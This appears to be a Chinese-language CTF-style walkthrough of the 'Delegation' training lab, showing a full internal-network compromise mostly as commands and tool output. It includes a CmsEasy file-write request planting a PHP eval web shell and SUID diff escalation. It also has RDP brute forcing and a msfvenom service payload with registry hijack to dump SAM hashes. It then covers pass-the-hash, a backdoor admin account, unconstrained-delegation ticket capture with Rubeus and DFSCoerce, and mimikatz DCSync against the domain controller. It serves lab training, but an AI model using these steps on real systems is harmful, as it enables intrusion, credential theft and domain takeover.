春秋云境-Delegation

内网攻防

https://jdr2021.github.io/2021/10/14/CmsEasy_7.7.5_20211012%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E5%92%8C%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E6%BC%8F%E6%B4%9Egetshell

利用漏洞

1
2
3
4
5
6
7
8
9
10
POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host:39.98.107.54
Content-Length: 76
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded;
Cookie: PHPSESSID=qrqmi2nksq9l5qatj65c1i69c3; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Connection: close

sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php @eval($_POST[1]);?>

上蚁剑

suid探针

1
find / -user root -perm -4000 -print 2>/dev/null

这里是diff提权

1
diff --line-format=%L /dev/null /home/flag/flag01.txt

横向移动

vps开个80传fscan扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.4.36     is alive
(icmp) Target 172.22.4.7      is alive
(icmp) Target 172.22.4.45     is alive
(icmp) Target 172.22.4.19     is alive
[*] Icmp alive hosts len is: 4
172.22.4.36:21 open
172.22.4.45:80 open
172.22.4.19:135 open
172.22.4.7:88 open
172.22.4.45:135 open
172.22.4.7:135 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.19:139 open
172.22.4.45:139 open
172.22.4.7:139 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo 
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetInfo 
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] WebTitle http://172.22.4.45        code:200 len:703    title:IIS Windows Server
[*] OsInfo 172.22.4.7    (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.4.36        code:200 len:68100  title:中文网页标题
 Datacenter 14393
[*] WebTitle http://172.22.4.36        code:200 len:68100  title:中文网页标题

flag1里面给了提示win19,从4.45入手,还提到了rockyou,这里不难猜出是爆破

1
./fscan -h 172.22.4.45  -p 1-65535

扫一下端口先

搭个代理爆破3389

1
2
3
proxychains4 hydra -l win19\Adrian -P /usr/share/wordlists/rockyou.txt 172.22.4.45 rdp

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19

1
win19\Adrian babygirl1

远程发现不行

看了博客知道使用用kali远程连接

1
proxychains rdesktop 172.22.4.45

修改完密码再用parallels client连上去

注册表提权

发现桌面有一个扫描结果,可以看到注册表提权

msf生成木马

1
msfvenom -p windows/x64/exec cmd='C:\windows\system32\cmd.exe /c C:\users\Adrian\Desktop\sam.bat ' --platform windows -f exe-service > a.exe

再写一个sam.bat,之后上传到win机器上。

1
2
3
reg save hklm\system C:\Users\Adrian\Desktop\system
reg save hklm\sam C:\Users\Adrian\Desktop\sam
reg save hklm\security C:\Users\Adrian\Desktop\security

win机器上powershell执行,修改注册表服务

1
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\a.exe" /f

cmd中再运行

1
sc start gupdate

桌面会生成三个文件

传到kaili里面解密一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kali)-[~/Desktop/baji]
└─# impacket-secretsdump LOCAL -sam sam -security security -system system    
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x08092415ee8b9b2ad2f5f5060fb48339
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:44d8d68ed7968b02da0ebddafd2dd43e:::
Adrian:1003:aad3b435b51404eeaad3b435b51404ee:94291812c16338307ad6e39f69438dc1:::
[*] Dumping cached domain logon information (domain/username:hash)
XIAORANG.LAB/Aldrich:$DCC2$10240#Aldrich#e4170181a8bb2a24e6113a9b4895307a: (2022-06-24 03:18:39)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:b4ed1b0e56b94c3200d14254d8b93c209751282f4f1fdc22f08b2445f88e7c9416640ec7be39a3a96542b57908b5425271ca84d4514e3452b9df96f9b53141b14f90632af381b68dcd2f5053cae57a2e50c9e04a4eb2e6dd3b707bb593b80096912294cc5d07eb6f5e6d918024f58aa48a169f48079d6a5eedb27d8de7a96da3647ab984d24d87f34c6ec275c33122e6971ae0028cf0402afcf9c6e5b566c5bd182eb970d4476b97d49c09bfb97d297e6cec7a40c74aae874ad9f51477ca6a50c746dfd75046340b067eb5bc44d691ed47995b10d319ee7a8261e99f3375775f8b36615e337f2020e22c7c72da7ad831
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:163bc37b84732d4ceeb4840fdaaf2271
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x4af114bade59102b7c64e41cde94be2257337fab
dpapi_userkey:0x372392e560b616ecd27b6ec0fe138ef86790b565
[*] NL$KM 
 0000   56 4B 21 B3 87 A3 29 41  FD 91 8F 3A 2D 2B 86 CC   VK!...)A...:-+..
 0010   49 4A EE 48 6C CD 9C D7  C7 DA 65 B6 62 4D 35 BD   IJ.Hl.....e.bM5.
 0020   09 F7 59 68 23 69 DE BA  2D 47 84 47 29 AD 5D AE   ..Yh#i..-G.G).].
 0030   A0 5F 19 CA 21 13 E4 6D  01 27 C3 FC 0C C1 0F 2E   ._..!..m.'......
NL$KM:564b21b387a32941fd918f3a2d2b86cc494aee486ccd9cd7c7da65b6624d35bd09f759682369deba2d47844729ad5daea05f19ca2113e46d0127c3fc0cc10f2e
[*] Cleaning up...

拿到admin的hash,打pth

1
proxychains python3 psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk
1
type C:\Users\Administrator\flag\flag02.txt

flag{92727123-810e-4309-a004-9e547651f41d}

添加后门用户

1
2
net user calmsec qwer1234! /add
net localgroup administrators calmsec /add

非约束委派

用机器账户跑一下bloodhound,哈希是$MACHINE.ACC的

1
proxychains bloodhound-python -u win19$ --hashes "aad3b435b51404eeaad3b435b51404ee:163bc37b84732d4ceeb4840fdaaf2271" -d xiaorang.lab -dc dc01.xiaorang.lab -c all --dns-tcp -ns 172.22.4.7 --auth-method ntlm --zip

发现win19和dc01非约束委派

用新创的admin账号登录win,然后用管理员权限运行Rubeus:

1
Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$

再利用dfscoerce漏洞,使域控强制访问进而获得域控的票据

拿到dc01票据,base64解密保存为DC01.kirbi

1
echo 'doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6K4Z3eNF+A8DAgQepsmPQ85lKX2xX79uHXzSrfCVoF0b0b2aM/TMfQBxHCdm9mtKcO156qmyoRj1m6qzKFm5X7qq6hktTGxZ6jYjNMpaHTeSLzvXpUOwmUGdvXVWo0nXDE3orH9wNh/xS83Dl6pUotbMZpEL/ulBn3BdPBbFrjFazCqkz1BVoUUcL6w9SO3KoMbe5+Lnl5rL7dJXwr8u1AkzBo1U3Co0T53hCYl4CJbptLGbJ1kXzxmJbS2isdheMIDBbxWqEO4E30XopEEgAxVlmka5fppXFnFKl2adzJj5mbbRK3ChrRa1ON4VETLlj8itybFfOoCtnIEC1ZKKktCy8TKwjFUP7dSod7a73an5BgPAKqC3ueN9EEyyRTsKt8u7K/Zi8xPa1vlAx1uryH9dXeXAoCA7RNdVIPAtpQf0bNkzVL9H8tf0eLaZbEZZWAkQrk1tCuYkYhdMZTW1C1b+N4Wf4SH4A98hxKbBMhWgtg3oR/wQHFHZIW4JgiX2/mn1I1BmMZQGvHeQWEju376owrAYtAS5zHBeUktNsYEUiBuhek8SfiFcKE21Rcv3kG6iku+5l2MH+DohrdVLRVp6jWrrN9YJq/9wQlkYgczjfMIetnxyOsbmYb53lberPcZCFkYkZr72m9yUdnKYoXTG7pBgzWYJ9yTewO0/TKT6cC70CwJwNF+c7l1YocdrcHFVXw+RAwSzj7pgj0iLiKwILTEjoNqVjDEVPSMXeAMo5HkoDd9S1nXoXAbs7Dhr0HKoPbhj23g/1CJrWC7TlQBSw6QGjjZ7+F3XykQZiXdGU5wzYi4sGhvEBkpyGC5iZZEhVNc2YZZZnTdkSZ2MOaAeXa0bZda21dl0c+gpAxxhp/YAE6qoL/6nncn0ItHwTYexT6x+UY6Gq2Zavm0TzFkrQ3t7979PvdOCz9BsPICX7TQJYFKi7FVWh8En9suaZdnnoGtf61sKvsnGkJoiwH3VPKPb6WbGslicWhA2JAL7U8aFNXYgQcgA6mSeb8PzJ04Y9vSrSoBeYk1F/h2ZE81rppiVBWmnuS72CQ0zPfac3fWbhdBTld6Nt9Nsgqz9W/48H80kEdnlqIDf71gCb+rHeKOrxkpny45sKUd3CHiuYPhTsZvxpivLlNGIqoV+SqJNt9VfNZNXANCmr4Hpy0/11NgAK8c6gi9+MeAzg7GHK0HRXmEsYoG925aPSwrlfZZEIjR0NozP47j7XMLKgP1Lu6tSSu9B64AjTGIh8enKB/hoSKvEVie0nOERMyHKQnW7M673hHBTw2apBFlKPHxofkYq6RmRb3sOPAiqAmj0EQuaq1fupYU6iYd8LzAecGgsUZR2iwlGxRt9RtQKyiSXu0OGv9fOR5Lo3279xwOXFxoIfFaI2RNwbl55TtR6iaYV/6P87Jxkf2FtOYabi1F9nhexHm4JFfO1MShQOjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCnM4CFnR8TYY5kjGPQWZbZa3P/3xCg2/q6c+qsbVTlsqEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDMwODA4NDIwMlqmERgPMjAyNTAzMDgxODQyMDJapxEYDzIwMjUwMzE1MDg0MjAyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==' | base64 -d > DC01.kirbi

传猕猴桃,打DCSync获取域控hash

1
mimikatz.exe "kerberos::purge" "kerberos::ptt DC01.kirbi" "lsadump::dcsync /domain:xiaorang.lab /user:administrator" "exit"

拿到dc01域控,再横向一下4.19

1
proxychains python3  psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.19

1
type C:\Users\Administrator\flag\flag03.txt

根据提示再打下一台

1
proxychains python3 psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 Administrator@172.22.4.7 

1
type C:\Users\Administrator\flag\flag04.txt